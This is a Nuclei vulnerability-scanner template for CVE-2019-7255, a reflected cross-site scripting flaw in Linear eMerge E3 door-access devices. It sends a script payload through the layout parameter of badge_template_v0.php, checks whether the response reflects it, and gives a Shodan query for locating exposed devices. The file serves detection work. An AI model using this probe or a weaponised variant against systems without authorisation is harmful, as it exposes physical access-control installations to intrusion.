nuclei-templates/cves/2019/CVE-2019-7255.yaml

32 lines
842 B
YAML

id: CVE-2019-7255
info:
name: Linear eMerge E3 - Reflected Cross Site Scripting
author: arafatansari
severity: medium
reference:
- https://www.applied-risk.com/resources/ar-2019-005
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7255
- https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html
description: |
Linear eMerge E3-Series devices allow XSS via layout parameter.
metadata:
shodan-query: http.html:"Linear eMerge"
verified: true
tags: xss,cve,2019
requests:
- method: GET
path:
- "{{BaseURL}}/badging/badge_template_v0.php?layout=<script>confirm(1)</script>"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<script>confirm(1)</script>'